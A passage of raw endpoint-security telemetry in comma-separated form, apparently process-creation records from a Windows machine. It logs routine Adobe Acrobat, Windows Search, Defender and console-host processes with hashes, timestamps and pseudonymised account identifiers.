DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:19:34.695638100+00:00,2021-06-24 03:21:31.825980400+00:00,5369c21e-f23b-4745-9f21-70c6b5b1c776,computerpii_0a470890c60768167990033d701e7bd881398861,174200,False,10.7740.19041.1052,False,11540474045175127,,11540474045176226,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,18560,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,,,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+60,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:41:57.880442900+00:00,21096,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320748_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320748 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:41:58.058050600+00:00,2021-06-24 01:43:59.193750800+00:00,80545d9f-33d4-48e0-a6bd-c384acf8b0a3,computerpii_0a470890c60768167990033d701e7bd881398861,172373,False,10.7740.19041.1052,False,11540474045144190,,11540474045175802,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+61,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 02:27:54.043017100+00:00,10736,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320861_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320861 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:27:54.168516300+00:00,2021-06-25 02:29:28.396153400+00:00,bcd87674-de11-4aef-948a-0e215c835467,computerpii_0a470890c60768167990033d701e7bd881398861,185482,False,10.7740.19041.1052,False,11540474045144190,,11540474045179076,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+62,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 07:56:24.538731500+00:00,17772,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 222F0166-A123-5830-36D1-9F9D70D0EEF0 ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:56:25.289303700+00:00,2021-06-24 07:56:48.304740300+00:00,a0b4cbb8-ba87-46ea-9271-678cdbf450ba,computerpii_0a470890c60768167990033d701e7bd881398861,177408,False,10.7740.19041.1052,False,11540474045145394,,11540474045177226,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+63,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:02:08.807632900+00:00,18324,AGCInvokerUtility.exe,"""AGCInvokerUtility.exe"" --appID=""AcrobatDC1"" --appVersion=""12.0"" --appProfileScope=""acrobatdc1"" --appPath=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe,3412680,f7c8ef9fd17e2c89dc2770cca8db6242,eb8faf481eeafb6be3c1254b81a800f2c74fa7d8ab682cab5409bef44251b60f,696a27e0a254ea3c0b14368bfc5d7b4997d20711,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:57:17.314109+00:00,21452,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\Aplha Node Limited\KYB\FilePII_edd840c5ba4793ec460b8655ad56cb3a92e86a66.pdf""",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:02:09.556919800+00:00,2021-06-25 01:04:02.231046700+00:00,783e9500-84fd-4bd3-b006-427d6a2043d3,computerpii_0a470890c60768167990033d701e7bd881398861,182546,False,10.7740.19041.1052,False,11540474045178537,,11540474045178599,2021-06-25 00:57:17.314109+00:00,21452,2021-06-25 00:57:17.314109+00:00,Acrobat.exe,21452,256,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,3796704,2021-05-28 05:30:12+00:00,2021-05-28 05:58:58+00:00,2021-06-25 00:41:29.174931300+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,1025.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC ,"Adobe Systems, Incorporated",GC Invoker Utility,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AGCInvokerUtility.exe,AGCInvokerUtility.exe,Adobe GC Invoker Utility
+64,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:02:11.491806500+00:00,11632,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_myxxml 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:02:11.558307400+00:00,2021-06-25 01:04:02.231541100+00:00,bc463d8d-3299-4289-a37d-41b21196de9e,computerpii_0a470890c60768167990033d701e7bd881398861,182560,False,10.7740.19041.1052,False,11540474045136991,,11540474045178603,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+65,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:02:11.501584400+00:00,17148,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 01:02:11.491806500+00:00,11632,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_myxxml 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:02:11.558805800+00:00,2021-06-25 01:04:02.231600700+00:00,c8e35e76-549e-42b1-a758-4cd270def69d,computerpii_0a470890c60768167990033d701e7bd881398861,182561,False,10.7740.19041.1052,False,11540474045178603,,11540474045178604,2021-06-25 01:02:11.491806500+00:00,11632,2021-06-25 01:02:11.491806500+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,11632,16512,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-25 00:41:28.804194500+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+66,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:02:11.805873+00:00,9060,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe845_ Global\UsGthrCtrlFltPipeMssGthrPipe845 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:02:11.850504100+00:00,2021-06-25 01:04:02.231711700+00:00,ad951e89-decc-49d2-8301-03d23df957e5,computerpii_0a470890c60768167990033d701e7bd881398861,182564,False,10.7740.19041.1052,False,11540474045144190,,11540474045178605,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,SearchIndexer.exe,4660,256,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+67,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:02:12.856167+00:00,15612,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_pjrcwm 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:02:13.611176600+00:00,2021-06-25 01:04:02.231812500+00:00,fad7932f-83ed-4eb4-9a07-f6008cfc3709,computerpii_0a470890c60768167990033d701e7bd881398861,182567,False,10.7740.19041.1052,False,11540474045136991,,11540474045178607,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,18560,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+68,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:02:12.864257100+00:00,9820,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 01:02:12.856167+00:00,15612,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_pjrcwm 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:02:13.614797400+00:00,2021-06-25 01:04:02.231847300+00:00,873bba1d-bdaa-4fe6-b4f7-e9d81dd4e1ec,computerpii_0a470890c60768167990033d701e7bd881398861,182568,False,10.7740.19041.1052,False,11540474045178607,,11540474045178608,2021-06-25 01:02:12.856167+00:00,15612,2021-06-25 01:02:12.856167+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,15612,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-25 00:41:28.804194500+00:00,2020-09-22 19:30:00+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,,,,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+69,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:03:51.729214200+00:00,640,SenseCncProxy.exe,4832,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:03:52.722352900+00:00,2021-06-25 01:04:02.278675600+00:00,36115cfa-adb4-40c8-b3ad-d8df4cfda7d7,computerpii_0a470890c60768167990033d701e7bd881398861,182595,False,10.7740.19041.1052,False,11540474045137006,,11540474045178615,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 